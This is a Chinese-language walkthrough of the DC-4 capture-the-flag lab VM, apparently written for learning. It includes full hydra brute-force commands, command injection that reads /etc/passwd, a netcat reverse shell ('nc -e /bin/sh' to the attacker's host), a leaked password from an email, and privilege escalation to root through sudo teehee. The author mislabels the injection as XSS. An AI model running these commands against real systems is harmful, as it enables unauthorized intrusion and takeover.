DC-4 渗透记录

信息收集

DC-4 靶机的ip为:192.168.204.183
首先对靶机进行端口扫描

nmap -p- -A -sV -oN DC4.txt 192.168.204.183
IMG_256
访问网站页面,发现一个后台登录功能,尝试爆破
IMG_256
dirb http://192.168.204.183/ -o DC-4_Content.txt
IMG_256
只有两个简单的子目录,到这里以前三个实验的思维是时候打开msf耍耍流氓
IMG_256
找到0对应的exploit/linux/http/nginx_chunked_size漏洞 (google)
CVE-2013-2028 一个经典的由整数溢出导致栈溢出的漏洞
IMG_256
利用失败,回到登录页面 尝试几个弱口令试试登录 失败

尝试使用hydra爆破 查看网页监视 得到登录元素 username&password 脚本为login.php
IMG_256

hydra -l admin -P /usr/share/wordlists/rockyou.txt -o DC4.pass -vV -t 8 -f 192.168.204.183 http-post-form “/login.php:username=^USER^&password=^PASS^:S=logout”
-o 为输出的保存密码文件
-vV显示执行细节
-t  指定爆破时的任务数量(默认16)
-f 表示破解出一个密码就停止
IMG_256
成功爆破得到密码 ,当然也可以直接使用bp来破解

漏洞利用

登录后只看见一个命令列表
IMG_256
检查之后发现命令方式写在了前端,经典的前后端未过滤关键命令的错误
IMG_256
IMG_256
进行xss攻击尝试
IMG_256
Xss成功,执行cat /etc/passwd

提权

IMG_256
一直在这个界面尝试不方便,于是想到了前端时间看到的端口转发,再尝试提权,先在kali机上监听一个端口

nc -lvvp 1234
IMG_256
再使用xss在服务器上运行
nc -e /bin/sh 192.168.204.98 1234
IMG_256
继续一系列操作 返回可交互的shell,寻找suid命令 发现jim用户下存在一个suid命令
IMG_256
进入jim账户,各种搜索 发现一个老密码的bak 保存下来到本地
IMG_256
尝试继续使用hydra爆破jim的密码
IMG_256
IMG_256
得到密码 通过ssh登录 查看刚刚看不到的邮件,没什么特殊
IMG_256
也进行suid,sudo-l查询,也没什么特殊的命令。

google了一下, 由于dc-4有了邮箱信件,我们去邮件里继续寻找一下
发现有一封charles发来的邮件,还附带密码 -.-
IMG_256

1
2
3
4
5
6
7
8
Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is: ^xHhA&hvim0y

See ya,
Charles

切换到Charles账户
IMG_256
在suoo-l之后发现teehee命令,并且该命令可以进行提权
IMG_256
IMG_256
IMG_256
Uid gid=0 即属于管理员权限
IMG_256
添加了一个不需要登录密码的root管理用户,并寻找到flag.txt
IMG_256

总结

1.Netcat 反弹用户shell
2.反射型Xss的利用
3.Hydra 对http的登录爆破(语句的编写)

hydra -l admin -P /usr/share/wordlists/rockyou.txt -o DC4.pass -vV -t 8 -f 192.168.204.183 http-post-form “/login.php:username=^USER^&password=^PASS^:S=logout”
4.Hydra对ssh的爆破
5.对个人信息邮件等的搜索查询及利用
6.Teehee追加文件内容命令的查询